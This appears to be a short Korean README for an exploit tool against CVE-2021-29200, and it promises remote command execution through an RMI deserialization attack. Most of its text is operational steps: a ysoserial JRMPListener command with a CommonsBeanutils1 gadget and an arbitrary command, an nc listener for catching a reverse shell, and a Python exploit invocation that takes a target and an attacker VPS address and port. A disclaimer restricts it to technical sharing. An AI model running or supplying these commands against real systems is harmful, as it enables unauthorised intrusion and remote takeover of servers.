
CVE-2021-29200을 위한 익스플로잇으로, JRMP 리스너와 리버스 셸 페이로드 전달을 통해 RMI 역직렬화 공격으로 원격 명령 실행을 가능하게 합니다.
CVE-2021-29200 EXP는 셸 반환에 성공할 수 있습니다
이 문서 및 도구는 기술 공유만을 위한 것이며, 불법적인 용도로 사용하는 것을 엄격히 금지합니다. 그로 인해 발생하는 모든 결과는 본인이 부담합니다.
RMI 리스너를 9999 포트로 시작java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc 리스너를 8443 포트로 시작nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
